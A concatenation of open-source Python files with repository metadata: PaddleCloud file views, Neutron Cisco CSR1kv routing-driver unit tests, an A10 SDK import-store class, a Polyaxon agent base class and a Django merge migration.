        # fix: `except Exception, e` is Python-2-only syntax.
        except Exception as e:
            return utils.error_message_response("file path not valid: %s" %
                                                str(e))
        if not os.path.exists(os.path.dirname(write_file)):
            try:
                os.makedirs(os.path.dirname(write_file))
            except OSError as exc:  # Guard against race condition
                # fix: errno was referenced here but never imported in this
                # module, so the race-condition path raised NameError.
                import errno
                if exc.errno != errno.EEXIST:
                    raise
        # FIXME: always overwrite package files
        with open(write_file, "w") as fn:
            while True:
                data = file_obj.read(4096)
                if not data:
                    break
                fn.write(data)
        return Response({"msg": ""})
class SimpleFileList(APIView):
    # List the contents of a directory under the requesting user's
    # PFS home (read-only sibling of SimpleFileView).
    permission_classes = (permissions.IsAuthenticated, )
    parser_classes = (
        FormParser,
        MultiPartParser, )
    def get(self, request, format=None):
        """
        Simple list files.

        Query params: ``path`` (/pfs/[dc]/home/[user]/...) and ``dc``.
        Responds with {"msg": <error>} on validation failure, otherwise
        {"msg": "", "items": [...]} with the directory listing.
        """
        file_path = request.query_params.get("path")
        dc = request.query_params.get("dc")
        # validate list path must be under user's dir
        path_parts = file_path.split(os.path.sep)
        msg = ""
        if len(path_parts) < 5:
            msg = "path must like /pfs/[dc]/home/[user]"
        else:
            if path_parts[1] != "pfs":
                msg = "path must start with /pfs"
            if path_parts[2] not in settings.DATACENTERS.keys():
                msg = "no datacenter " + path_parts[2]
            if path_parts[3] != "home":
                msg = "path must like /pfs/[dc]/home/[user]"
            if path_parts[4] != request.user.username:
                msg = "not a valid user: " + path_parts[4]
        if msg:
            return Response({"msg": msg})
        # NOTE(review): this remaps /pfs/[dc]/home/[user] to
        # /pfs/[user] rather than settings.STORAGE_PATH as the other
        # views do — confirm the mount layout this relies on.
        real_path = file_path.replace("/pfs/%s/home/%s" % (
            dc, request.user.username), "/pfs/%s" % request.user.username)
        if not os.path.exists(real_path):
            return Response({"msg": "dir not exist"})
        return Response({"msg": "", "items": os.listdir(real_path)})
| {
"content_hash": "2694b7bc5582195c88bcf2479f704204",
"timestamp": "",
"source": "github",
"line_count": 387,
"max_line_length": 117,
"avg_line_length": 34.348837209302324,
"alnum_prop": 0.5988114044986083,
"repo_name": "gongweibao/cloud",
"id": "7018618396acc5ab9300d22f2b0fe10aec30722e",
"size": "13906",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "python/paddlecloud/paddlejob/views.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1103"
},
{
"name": "Go",
"bytes": "79494"
},
{
"name": "HTML",
"bytes": "8917"
},
{
"name": "JavaScript",
"bytes": "270250"
},
{
"name": "Python",
"bytes": "150171"
},
{
"name": "Shell",
"bytes": "13820"
}
],
"symlink_target": ""
} |
import sys
import mock
import netaddr
from neutron.common import constants as l3_constants
from neutron.openstack.common import uuidutils
from neutron.tests import base
from neutron.plugins.cisco.cfg_agent.device_drivers.csr1kv import (
cisco_csr1kv_snippets as snippets)
sys.modules['ncclient'] = mock.MagicMock()
sys.modules['ciscoconfparse'] = mock.MagicMock()
from neutron.plugins.cisco.cfg_agent.device_drivers.csr1kv import (
csr1kv_routing_driver as csr_driver)
from neutron.plugins.cisco.cfg_agent.service_helpers import routing_svc_helper
_uuid = uuidutils.generate_uuid
FAKE_ID = _uuid()
PORT_ID = _uuid()
class TestCSR1kvRouting(base.BaseTestCase):
    """Unit tests for CSR1kvRoutingDriver.

    The netconf connection is replaced by a MagicMock, so each test
    verifies either that the right private helper was invoked with the
    right arguments, or that the expected config snippet was pushed via
    edit_config on the mocked connection.
    """
    def setUp(self):
        super(TestCSR1kvRouting, self).setUp()
        device_params = {'management_ip_address': 'fake_ip',
                         'protocol_port': 22,
                         'credentials': {"username": "stack",
                                         "password": "cisco"},
                         }
        self.driver = csr_driver.CSR1kvRoutingDriver(
            **device_params)
        self.mock_conn = mock.MagicMock()
        self.driver._csr_conn = self.mock_conn
        self.driver._check_response = mock.MagicMock(return_value=True)
        # VRF names derive from the router id, truncated to the device's
        # maximum name length.
        self.vrf = ('nrouter-' + FAKE_ID)[:csr_driver.CSR1kvRoutingDriver.
                                          DEV_NAME_LEN]
        self.driver._get_vrfs = mock.Mock(return_value=[self.vrf])
        # Fake external gateway port: VLAN 1000 on hosting port t2_p:0.
        self.ex_gw_ip = '20.0.0.30'
        self.ex_gw_cidr = '20.0.0.30/24'
        self.ex_gw_vlan = 1000
        self.ex_gw_gateway_ip = '20.0.0.1'
        self.ex_gw_port = {'id': _uuid(),
                           'network_id': _uuid(),
                           'fixed_ips': [{'ip_address': self.ex_gw_ip,
                                          'subnet_id': _uuid()}],
                           'subnet': {'cidr': self.ex_gw_cidr,
                                      'gateway_ip': self.ex_gw_gateway_ip},
                           'ip_cidr': self.ex_gw_cidr,
                           'mac_address': 'ca:fe:de:ad:be:ef',
                           'hosting_info': {'segmentation_id': self.ex_gw_vlan,
                                            'hosting_port_name': 't2_p:0'}}
        # Fake internal port: VLAN 500 on hosting port t1_p:0.
        self.vlan_no = 500
        self.gw_ip_cidr = '10.0.0.1/16'
        self.gw_ip = '10.0.0.1'
        self.hosting_port = 't1_p:0'
        self.port = {'id': PORT_ID,
                     'ip_cidr': self.gw_ip_cidr,
                     'fixed_ips': [{'ip_address': self.gw_ip}],
                     'hosting_info': {'segmentation_id': self.vlan_no,
                                      'hosting_port_name': self.hosting_port}}
        int_ports = [self.port]
        self.router = {
            'id': FAKE_ID,
            l3_constants.INTERFACE_KEY: int_ports,
            'enable_snat': True,
            'routes': [],
            'gw_port': self.ex_gw_port}
        self.ri = routing_svc_helper.RouterInfo(FAKE_ID, self.router)
        self.ri.internal_ports = int_ports
    def test_csr_get_vrf_name(self):
        """The driver derives the VRF name from the router id."""
        self.assertEqual(self.driver._csr_get_vrf_name(self.ri), self.vrf)
    def test_create_vrf(self):
        confstr = snippets.CREATE_VRF % self.vrf
        self.driver._create_vrf(self.vrf)
        self.assertTrue(self.driver._csr_conn.edit_config.called)
        self.driver._csr_conn.edit_config.assert_called_with(target='running',
                                                             config=confstr)
    def test_remove_vrf(self):
        confstr = snippets.REMOVE_VRF % self.vrf
        self.driver._remove_vrf(self.vrf)
        self.assertTrue(self.driver._csr_conn.edit_config.called)
        self.driver._csr_conn.edit_config.assert_called_with(target='running',
                                                             config=confstr)
    def test_router_added(self):
        """Adding a router pushes the CREATE_VRF snippet."""
        confstr = snippets.CREATE_VRF % self.vrf
        self.driver.router_added(self.ri)
        self.assertTrue(self.driver._csr_conn.edit_config.called)
        self.driver._csr_conn.edit_config.assert_called_with(target='running',
                                                             config=confstr)
    def test_router_removed(self):
        """Removing the VRF pushes the REMOVE_VRF snippet exactly once."""
        confstr = snippets.REMOVE_VRF % self.vrf
        self.driver._remove_vrf(self.vrf)
        self.assertTrue(self.driver._csr_conn.edit_config.called)
        self.driver._csr_conn.edit_config.assert_called_once_with(
            target='running', config=confstr)
    def test_internal_network_added(self):
        """An internal net creates a subinterface on GigabitEthernet0."""
        self.driver._create_subinterface = mock.MagicMock()
        interface = 'GigabitEthernet0' + '.' + str(self.vlan_no)
        self.driver.internal_network_added(self.ri, self.port)
        args = (interface, self.vlan_no, self.vrf, self.gw_ip,
                netaddr.IPAddress('255.255.0.0'))
        self.driver._create_subinterface.assert_called_once_with(*args)
    def test_internal_network_removed(self):
        self.driver._remove_subinterface = mock.MagicMock()
        interface = 'GigabitEthernet0' + '.' + str(self.vlan_no)
        self.driver.internal_network_removed(self.ri, self.port)
        self.driver._remove_subinterface.assert_called_once_with(interface)
    def test_routes_updated(self):
        """'replace' adds and 'delete' removes a static route in the VRF."""
        dest_net = '20.0.0.0/16'
        next_hop = '10.0.0.255'
        route = {'destination': dest_net,
                 'nexthop': next_hop}
        dest = netaddr.IPAddress('20.0.0.0')
        destmask = netaddr.IPNetwork(dest_net).netmask
        self.driver._add_static_route = mock.MagicMock()
        self.driver._remove_static_route = mock.MagicMock()
        self.driver.routes_updated(self.ri, 'replace', route)
        self.driver._add_static_route.assert_called_once_with(
            dest, destmask, next_hop, self.vrf)
        self.driver.routes_updated(self.ri, 'delete', route)
        self.driver._remove_static_route.assert_called_once_with(
            dest, destmask, next_hop, self.vrf)
    def test_floatingip(self):
        """Floating IP add/remove drives NAT helpers on the gw interface."""
        floating_ip = '15.1.2.3'
        fixed_ip = '10.0.0.3'
        self.driver._add_floating_ip = mock.MagicMock()
        self.driver._remove_floating_ip = mock.MagicMock()
        self.driver._add_interface_nat = mock.MagicMock()
        self.driver._remove_dyn_nat_translations = mock.MagicMock()
        self.driver._remove_interface_nat = mock.MagicMock()
        self.driver.floating_ip_added(self.ri, self.ex_gw_port,
                                      floating_ip, fixed_ip)
        self.driver._add_floating_ip.assert_called_once_with(
            floating_ip, fixed_ip, self.vrf)
        self.driver.floating_ip_removed(self.ri, self.ex_gw_port,
                                        floating_ip, fixed_ip)
        self.driver._remove_interface_nat.assert_called_once_with(
            'GigabitEthernet1.1000', 'outside')
        self.driver._remove_dyn_nat_translations.assert_called_once_with()
        self.driver._remove_floating_ip.assert_called_once_with(
            floating_ip, fixed_ip, self.vrf)
        self.driver._add_interface_nat.assert_called_once_with(
            'GigabitEthernet1.1000', 'outside')
    def test_external_gateway_added(self):
        self.driver._create_subinterface = mock.MagicMock()
        self.driver._add_default_static_route = mock.MagicMock()
        ext_interface = 'GigabitEthernet1' + '.' + str(1000)
        args = (ext_interface, self.ex_gw_vlan, self.vrf, self.ex_gw_ip,
                netaddr.IPAddress('255.255.255.0'))
        self.driver.external_gateway_added(self.ri, self.ex_gw_port)
        self.driver._create_subinterface.assert_called_once_with(*args)
        self.driver._add_default_static_route.assert_called_once_with(
            self.ex_gw_gateway_ip, self.vrf)
    def test_enable_internal_network_NAT(self):
        self.driver._nat_rules_for_internet_access = mock.MagicMock()
        int_interface = ('GigabitEthernet0' + '.' + str(self.vlan_no))
        ext_interface = 'GigabitEthernet1' + '.' + str(1000)
        args = (('acl_' + str(self.vlan_no)),
                netaddr.IPNetwork(self.gw_ip_cidr).network,
                netaddr.IPNetwork(self.gw_ip_cidr).hostmask,
                int_interface,
                ext_interface,
                self.vrf)
        self.driver.enable_internal_network_NAT(self.ri, self.port,
                                                self.ex_gw_port)
        self.driver._nat_rules_for_internet_access.assert_called_once_with(
            *args)
    def test_enable_internal_network_NAT_with_confstring(self):
        # Same operation as above, but verified at the config-snippet level.
        self.driver._csr_conn.reset_mock()
        self.driver._check_acl = mock.Mock(return_value=False)
        int_interface = ('GigabitEthernet0' + '.' + str(self.vlan_no))
        ext_interface = 'GigabitEthernet1' + '.' + str(1000)
        acl_no = ('acl_' + str(self.vlan_no))
        int_network = netaddr.IPNetwork(self.gw_ip_cidr).network
        int_net_mask = netaddr.IPNetwork(self.gw_ip_cidr).hostmask
        self.driver.enable_internal_network_NAT(self.ri, self.port,
                                                self.ex_gw_port)
        self.assert_edit_running_config(
            snippets.CREATE_ACL, (acl_no, int_network, int_net_mask))
        self.assert_edit_running_config(
            snippets.SET_DYN_SRC_TRL_INTFC, (acl_no, ext_interface, self.vrf))
        self.assert_edit_running_config(
            snippets.SET_NAT, (int_interface, 'inside'))
        self.assert_edit_running_config(
            snippets.SET_NAT, (ext_interface, 'outside'))
    def test_disable_internal_network_NAT(self):
        self.driver._remove_interface_nat = mock.MagicMock()
        self.driver._remove_dyn_nat_translations = mock.MagicMock()
        self.driver._remove_dyn_nat_rule = mock.MagicMock()
        int_interface = ('GigabitEthernet0' + '.' + str(self.vlan_no))
        ext_interface = 'GigabitEthernet1' + '.' + str(1000)
        self.driver.disable_internal_network_NAT(self.ri, self.port,
                                                 self.ex_gw_port)
        args = (('acl_' + str(self.vlan_no)), ext_interface, self.vrf)
        self.driver._remove_interface_nat.assert_called_once_with(
            int_interface, 'inside')
        self.driver._remove_dyn_nat_translations.assert_called_once_with()
        self.driver._remove_dyn_nat_rule.assert_called_once_with(*args)
    def assert_edit_running_config(self, snippet_name, args):
        """Assert the given snippet (formatted with args, if any) was
        pushed to the running config at some point."""
        if args:
            confstr = snippet_name % args
        else:
            confstr = snippet_name
        self.driver._csr_conn.edit_config.assert_any_call(
            target='running', config=confstr)
    def test_disable_internal_network_NAT_with_confstring(self):
        # Snippet-level verification of NAT teardown.
        self.driver._cfg_exists = mock.Mock(return_value=True)
        int_interface = ('GigabitEthernet0' + '.' + str(self.vlan_no))
        ext_interface = 'GigabitEthernet1' + '.' + str(1000)
        acl_no = 'acl_' + str(self.vlan_no)
        self.driver.disable_internal_network_NAT(self.ri, self.port,
                                                 self.ex_gw_port)
        self.assert_edit_running_config(
            snippets.REMOVE_NAT, (int_interface, 'inside'))
        self.assert_edit_running_config(snippets.CLEAR_DYN_NAT_TRANS, None)
        self.assert_edit_running_config(
            snippets.REMOVE_DYN_SRC_TRL_INTFC, (acl_no, ext_interface,
                                                self.vrf))
        self.assert_edit_running_config(snippets.REMOVE_ACL, acl_no)
| {
"content_hash": "f9808c23ff6a0fdbd6ec27def0c5c059",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 79,
"avg_line_length": 42.90298507462686,
"alnum_prop": 0.5799269438163159,
"repo_name": "virtualopensystems/neutron",
"id": "c93b2d45b01aab8862c8560eeae95809934ffcd1",
"size": "12184",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "neutron/tests/unit/cisco/cfg_agent/test_csr1kv_routing_driver.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "21914"
},
{
"name": "JavaScript",
"bytes": "60527"
},
{
"name": "Python",
"bytes": "9873662"
},
{
"name": "Shell",
"bytes": "9202"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
} |
from a10sdk.common.A10BaseClass import A10BaseClass


class Store(A10BaseClass):
    """Import-store profile resource.

    Create store name for remote url. Supports CRUD operations and
    inherits from `common/A10BaseClass`; this is the "PARENT" class for
    this module.

    URL for this object:
    `https://<Hostname|Ip address>//axapi/v3/import/store`.

    :param create: Create an import store profile (flag, default 0, optional)
    :param name: profile name to store remote url (string, 1-31 chars, optional)
    :param remote_file: remote url (string, optional)
    :param delete: Delete an import store profile (flag, default 0, optional)
    :param DeviceProxy: The device proxy for REST operations and session
        handling. Refer to `common/device_proxy.py`.
    """

    def __init__(self, **kwargs):
        self.ERROR_MSG = ""
        self.required = []
        self.b_key = "store"
        self.a10_url = "/axapi/v3/import/store"
        self.DeviceProxy = ""
        # Declared fields default to empty strings; keyword arguments
        # override them (or attach additional attributes) below.
        self.create = ""
        self.name = ""
        self.remote_file = ""
        self.delete = ""
        for attr_name, attr_value in kwargs.items():
            setattr(self, attr_name, attr_value)
"content_hash": "dc52ffff2da6698182cbe7264bed92d7",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 157,
"avg_line_length": 34.41463414634146,
"alnum_prop": 0.6158752657689582,
"repo_name": "a10networks/a10sdk-python",
"id": "e13b0aed3d0fb25728e212db61785565574ed9ac",
"size": "1411",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "a10sdk/core/A10_import/import_store.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "6956372"
}
],
"symlink_target": ""
} |
import time
import traceback
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, Tuple
from kubernetes.client.rest import ApiException
import polyaxon_sdk
from polyaxon import live_state, settings
from polyaxon.agents import converter
from polyaxon.agents.spawners.spawner import Spawner
from polyaxon.client import PolyaxonClient
from polyaxon.env_vars.getters import get_run_info
from polyaxon.exceptions import PolypodException
from polyaxon.lifecycle import V1StatusCondition, V1Statuses
from polyaxon.logger import logger
from polyaxon.schemas.cli.checks_config import ChecksConfig
from polyaxon.utils.tz_utils import now
from polyaxon.utils.workers_utils import exit_context, get_pool_workers, get_wait
class BaseAgent:
    """Base class for Polyaxon agents.

    An agent periodically polls the platform for its state (`get_state`),
    fans the pending runs out to a thread pool (submit/apply/stop/delete),
    executes them on Kubernetes through a `Spawner`, and reports run status
    back via a `PolyaxonClient`.

    Subclasses must implement `get_info`, `get_state` and
    `sync_compatible_updates`.
    """

    # Touched by `ping` and read by `pong` to implement liveness checks.
    HEALTH_FILE = "/tmp/.healthz"
    # Idle times (seconds) before shutting down when the platform marked the
    # agent stopped/archived while the deployment is still running.
    SLEEP_STOP_TIME = 60 * 5
    SLEEP_ARCHIVED_TIME = 60 * 60

    def __init__(self, sleep_interval=None):
        # Fixed polling interval in seconds; when None, `get_wait(index)`
        # supplies an adaptive wait instead.
        self.sleep_interval = sleep_interval
        self.spawner = Spawner()
        self._spawner_refreshed_at = now()
        self.client = PolyaxonClient()
        self._graceful_shutdown = False
        # Agent-level config merged into every compiled run resource.
        self.content = settings.AGENT_CONFIG.to_dict(dump=True)

    def get_info(self) -> polyaxon_sdk.V1Agent:
        """Return this agent's descriptor. Implemented by subclasses."""
        raise NotImplementedError

    def get_state(self) -> polyaxon_sdk.V1AgentStateResponse:
        """Return the current platform state. Implemented by subclasses."""
        raise NotImplementedError

    def sync_compatible_updates(self, compatible_updates: Dict):
        """Apply compatible updates from the platform. Implemented by subclasses."""
        raise NotImplementedError

    @classmethod
    def get_healthz_config(cls):
        """Read the health-check file; return None if missing or unreadable."""
        try:
            return ChecksConfig.read(cls.HEALTH_FILE, config_type=".json")
        except Exception:  # noqa
            return

    @classmethod
    def ping(cls):
        """Record a liveness heartbeat in the health file."""
        ChecksConfig.init_file(cls.HEALTH_FILE)
        config = cls.get_healthz_config()
        if config:
            config.last_check = now()
            config.write(cls.HEALTH_FILE, mode=config.WRITE_MODE)

    @classmethod
    def pong(cls, interval: int = 15) -> bool:
        """Return True if a heartbeat was recorded within `interval` seconds."""
        config = cls.get_healthz_config()
        if not config:
            return False
        return not config.should_check(interval=interval)

    def refresh_spawner(self):
        """Refresh the spawner once its configured refresh interval elapsed."""
        if (
            now() - self._spawner_refreshed_at
        ).total_seconds() > settings.AGENT_CONFIG.get_spawner_refresh_interval():
            logger.debug("Refreshing spawner ... ")
            self.spawner.refresh()
            self._spawner_refreshed_at = now()

    def start(self) -> None:
        """Run the agent loop until the exit event fires, then shut down."""
        try:
            with exit_context() as exit_event:
                index = 0
                workers = get_pool_workers()
                with ThreadPoolExecutor(workers) as pool:
                    logger.debug("Thread pool Workers: {}".format(workers))
                    timeout = self.sleep_interval or get_wait(index)
                    while not exit_event.wait(timeout=timeout):
                        index += 1
                        self.refresh_spawner()
                        agent_state = self.process(pool)
                        self._check_status(agent_state)
                        if agent_state.state.full:
                            # NOTE(review): resetting the backoff index looks
                            # intended to poll again sooner while the platform
                            # reports a full state — confirm against get_wait.
                            index = 2
                        self.ping()
                        timeout = self.sleep_interval or get_wait(index)
                        logger.info("Sleeping for {} seconds".format(timeout))
        finally:
            self.end()

    def _check_status(self, agent_state):
        """Shut the agent down when the platform stopped or archived it.

        Fix: the original implicit string concatenations were missing
        separator spaces, printing "...platform,but the deployment is still
        running.Please...".
        """
        if agent_state.status == V1Statuses.STOPPED:
            print(
                "Agent has been stopped from the platform, "
                "but the deployment is still running. "
                "Please either set the agent to starting or teardown the agent deployment."
            )
            self.end(sleep=self.SLEEP_STOP_TIME)
        elif agent_state.live_state < live_state.STATE_LIVE:
            print(
                "Agent has been archived from the platform, "
                "but the deployment is still running. "
                "Please either restore the agent or teardown the agent deployment."
            )
            self.end(sleep=self.SLEEP_ARCHIVED_TIME)

    def end(self, sleep: int = None):
        """Mark shutdown; optionally idle `sleep` seconds before returning."""
        self._graceful_shutdown = True
        if sleep:
            time.sleep(sleep)
        else:
            logger.info("Agent is shutting down.")

    def process(self, pool: "ThreadPoolExecutor") -> polyaxon_sdk.V1AgentStateResponse:
        """Fetch platform state and fan each pending run out to the pool.

        Returns the fetched state, or an empty `V1AgentStateResponse` when
        no state was found or an error occurred (errors are logged, never
        propagated, so the agent loop keeps running).
        """
        try:
            agent_state = self.get_state()
            if agent_state.compatible_updates:
                self.sync_compatible_updates(agent_state.compatible_updates)
            if agent_state:
                logger.info("Starting runs submission process.")
            else:
                logger.info("No state was found.")
                return polyaxon_sdk.V1AgentStateResponse()
            state = agent_state.state
            for run_data in state.schedules or []:
                pool.submit(self.submit_run, run_data)
            for run_data in state.queued or []:
                pool.submit(self.submit_run, run_data)
            for run_data in state.checks or []:
                pool.submit(self.check_run, run_data)
            for run_data in state.stopping or []:
                pool.submit(self.stop_run, run_data)
            for run_data in state.apply or []:
                pool.submit(self.apply_run, run_data)
            for run_data in state.deleting or []:
                pool.submit(self.delete_run, run_data)
            for run_data in state.hooks or []:
                pool.submit(self.make_and_create_run, run_data)
            for run_data in state.watchdogs or []:
                pool.submit(self.make_and_create_run, run_data)
            for run_data in state.tuners or []:
                # Tuners are created with default_auth=True.
                pool.submit(self.make_and_create_run, run_data, True)
            return agent_state
        except Exception as exc:
            logger.error(exc)
            return polyaxon_sdk.V1AgentStateResponse()

    def log_run_failed(
        self,
        run_owner: str,
        run_project: str,
        run_uuid: str,
        exc: Exception,
        message: str = None,
    ) -> None:
        """Mark a run FAILED on the platform, attaching the exception trace."""
        message = message or "Agent failed deploying run.\n"
        message += "error: {}\n{}".format(repr(exc), traceback.format_exc())
        self.log_run_status(
            run_owner=run_owner,
            run_project=run_project,
            run_uuid=run_uuid,
            status=V1Statuses.FAILED,
            reason="AgentLogger",
            message=message,
        )
        logger.warning(message)

    def log_run_stopped(self, run_owner: str, run_project: str, run_uuid: str) -> None:
        """Mark a run STOPPED when its resource is no longer found."""
        message = "Run was not found. The agent assumed it was already stopped."
        self.log_run_status(
            run_owner=run_owner,
            run_project=run_project,
            run_uuid=run_uuid,
            status=V1Statuses.STOPPED,
            reason="AgentLogger",
            message=message,
        )
        logger.warning(message)

    def log_run_scheduled(
        self, run_owner: str, run_project: str, run_uuid: str
    ) -> None:
        """Mark a run SCHEDULED after its resource was created."""
        message = "Run was scheduled by the agent."
        self.log_run_status(
            run_owner=run_owner,
            run_project=run_project,
            run_uuid=run_uuid,
            status=V1Statuses.SCHEDULED,
            reason="AgentLogger",
            message=message,
        )
        logger.info(message)

    def log_run_running(self, run_owner: str, run_project: str, run_uuid: str) -> None:
        """Mark a run RUNNING after its resource changes were applied."""
        message = "Run changes were applied by the agent."
        self.log_run_status(
            run_owner=run_owner,
            run_project=run_project,
            run_uuid=run_uuid,
            status=V1Statuses.RUNNING,
            reason="AgentLogger",
            message=message,
        )
        logger.info(message)

    def log_run_status(
        self,
        run_owner: str,
        run_project: str,
        run_uuid: str,
        status: str,
        reason: str = None,
        message: str = None,
    ):
        """Create a status condition for the run on the platform (async)."""
        status_condition = V1StatusCondition.get_condition(
            type=status, status=True, reason=reason, message=message
        )
        self.client.runs_v1.create_run_status(
            owner=run_owner,
            project=run_project,
            uuid=run_uuid,
            body={"condition": status_condition},
            async_req=True,
        )

    def clean_run(self, run_uuid: str, run_kind: str):
        """Best-effort clean + stop of a run's resources; never raises."""
        try:
            self.spawner.clean(run_uuid=run_uuid, run_kind=run_kind)
            self.spawner.stop(run_uuid=run_uuid, run_kind=run_kind)
        except ApiException as e:
            if e.status == 404:
                logger.info("Run does not exist.")
        except Exception as e:
            logger.info(
                "Run could not be cleaned: {}\n{}".format(
                    repr(e), traceback.format_exc()
                )
            )

    def make_run_resource(
        self,
        owner_name: str,
        project_name: str,
        run_name: str,
        run_uuid: str,
        content: str,
        default_auth=False,
    ) -> Dict:
        """Compile a run manifest into a k8s resource; None on failure.

        Failures are only logged here (no platform status update) —
        compare with `prepare_run_resource` which reports FAILED.
        """
        try:
            return converter.make_and_convert(
                owner_name=owner_name,
                project_name=project_name,
                run_name=run_name,
                run_uuid=run_uuid,
                content=content,
                default_auth=default_auth,
            )
        except PolypodException as e:
            logger.info(
                "Run could not be cleaned. Agent failed converting run manifest: {}\n{}".format(
                    repr(e), traceback.format_exc()
                )
            )
        except Exception as e:
            logger.info(
                "Agent failed during compilation with unknown exception: {}\n{}".format(
                    repr(e), traceback.format_exc()
                )
            )

    def prepare_run_resource(
        self,
        owner_name: str,
        project_name: str,
        run_name: str,
        run_uuid: str,
        content: str,
    ) -> Dict:
        """Convert a run manifest into a k8s resource; None on failure.

        Unlike `make_run_resource`, conversion failures mark the run
        FAILED on the platform.
        """
        try:
            return converter.convert(
                owner_name=owner_name,
                project_name=project_name,
                run_name=run_name,
                run_uuid=run_uuid,
                content=content,
                default_auth=True,
                agent_content=self.content,
            )
        except PolypodException as e:
            self.log_run_failed(
                run_owner=owner_name,
                run_project=project_name,
                run_uuid=run_uuid,
                exc=e,
                message="Agent failed converting run manifest.\n",
            )
        except Exception as e:
            self.log_run_failed(
                run_owner=owner_name,
                run_project=project_name,
                run_uuid=run_uuid,
                exc=e,
                message="Agent failed during compilation with unknown exception.\n",
            )

    def submit_run(self, run_data: Tuple[str, str, str, str]):
        """Create a run's resource.

        `run_data` is (run_instance, run_kind, run_name, content).
        A 409 (already exists) falls back to `apply_run`; other failures
        mark the run FAILED.
        """
        run_owner, run_project, run_uuid = get_run_info(run_instance=run_data[0])
        resource = self.prepare_run_resource(
            owner_name=run_owner,
            project_name=run_project,
            run_name=run_data[2],
            run_uuid=run_uuid,
            content=run_data[3],
        )
        if not resource:
            return
        try:
            self.spawner.create(
                run_uuid=run_uuid, run_kind=run_data[1], resource=resource
            )
        except ApiException as e:
            if e.status == 409:
                logger.info("Run already running, triggering an apply mechanism.")
                self.apply_run(run_data=run_data)
            else:
                logger.info("Run submission error.")
                self.log_run_failed(
                    run_owner=run_owner,
                    run_project=run_project,
                    run_uuid=run_uuid,
                    exc=e,
                )
        except Exception as e:
            self.log_run_failed(
                run_owner=run_owner,
                run_project=run_project,
                run_uuid=run_uuid,
                exc=e,
            )

    def make_and_create_run(
        self, run_data: Tuple[str, str, str, str], default_auth: bool = False
    ):
        """Compile and create a platform-side run (hooks/watchdogs/tuners).

        Failures are only logged; no platform status update is made.
        """
        run_owner, run_project, run_uuid = get_run_info(run_instance=run_data[0])
        resource = self.make_run_resource(
            owner_name=run_owner,
            project_name=run_project,
            run_name=run_data[2],
            run_uuid=run_uuid,
            content=run_data[3],
            default_auth=default_auth,
        )
        if not resource:
            return
        try:
            self.spawner.create(
                run_uuid=run_uuid, run_kind=run_data[1], resource=resource
            )
        except ApiException as e:
            if e.status == 409:
                logger.info("Run already running, triggering an apply mechanism.")
            else:
                logger.info("Run submission error.")
        except Exception as e:
            # Fix: the original message was copy-pasted from the converter
            # failure path and wrongly claimed the run "could not be cleaned".
            logger.info(
                "Run could not be created: {}\n{}".format(
                    repr(e), traceback.format_exc()
                )
            )

    def apply_run(self, run_data: Tuple[str, str, str, str]):
        """Apply changes to an existing run's resource; clean up on failure."""
        run_owner, run_project, run_uuid = get_run_info(run_instance=run_data[0])
        resource = self.prepare_run_resource(
            owner_name=run_owner,
            project_name=run_project,
            run_name=run_data[2],
            run_uuid=run_uuid,
            content=run_data[3],
        )
        if not resource:
            return
        try:
            self.spawner.apply(
                run_uuid=run_uuid, run_kind=run_data[1], resource=resource
            )
            self.log_run_running(
                run_owner=run_owner, run_project=run_project, run_uuid=run_uuid
            )
        except Exception as e:
            self.log_run_failed(
                run_owner=run_owner, run_project=run_project, run_uuid=run_uuid, exc=e
            )
            self.clean_run(run_uuid=run_uuid, run_kind=run_data[1])

    def check_run(self, run_data: Tuple[str, str]):
        """Verify a run's resource still exists; mark STOPPED if gone (404)."""
        run_owner, run_project, run_uuid = get_run_info(run_instance=run_data[0])
        try:
            self.spawner.get(run_uuid=run_uuid, run_kind=run_data[1])
        except ApiException as e:
            if e.status == 404:
                logger.info(
                    "Run does not exist anymore, it could have been stopped or deleted."
                )
                self.log_run_stopped(
                    run_owner=run_owner, run_project=run_project, run_uuid=run_uuid
                )

    def stop_run(self, run_data: Tuple[str, str]):
        """Stop a run; a missing resource (404) is treated as already stopped."""
        run_owner, run_project, run_uuid = get_run_info(run_instance=run_data[0])
        try:
            self.spawner.stop(run_uuid=run_uuid, run_kind=run_data[1])
        except ApiException as e:
            if e.status == 404:
                logger.info("Run does not exist anymore, it could have been stopped.")
                self.log_run_stopped(
                    run_owner=run_owner, run_project=run_project, run_uuid=run_uuid
                )
        except Exception as e:
            self.log_run_failed(
                run_owner=run_owner,
                run_project=run_project,
                run_uuid=run_uuid,
                exc=e,
                message="Agent failed stopping run.\n",
            )

    def delete_run(self, run_data: Tuple[str, str, str, str]):
        """Clean a run's resources and re-create it when content is provided."""
        # Only the uuid is needed here; owner/project were unused locals.
        _, _, run_uuid = get_run_info(run_instance=run_data[0])
        self.clean_run(run_uuid=run_uuid, run_kind=run_data[1])
        if run_data[3]:
            self.make_and_create_run(run_data)
| {
"content_hash": "1aa0a74990e9242ea5fe7de94637ebd3",
"timestamp": "",
"source": "github",
"line_count": 443,
"max_line_length": 96,
"avg_line_length": 35.73363431151242,
"alnum_prop": 0.5416929879974731,
"repo_name": "polyaxon/polyaxon",
"id": "f921f93ca09b291fde3af9053deab034cfca2921",
"size": "16434",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "core/polyaxon/agents/base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1989"
},
{
"name": "Python",
"bytes": "5201898"
},
{
"name": "Shell",
"bytes": "1565"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Merge migration for the ``fundraising`` app: it reconciles two diverged
    # migration branches (0007 and 0003) and intentionally performs no schema
    # operations of its own.
    dependencies = [
        ('fundraising', '0007_auto_20150119_1335'),
        ('fundraising', '0003_auto_20150119_1842'),
    ]
    operations = [
    ]
| {
"content_hash": "f3142e8318073153e96b70d3802c02a3",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 51,
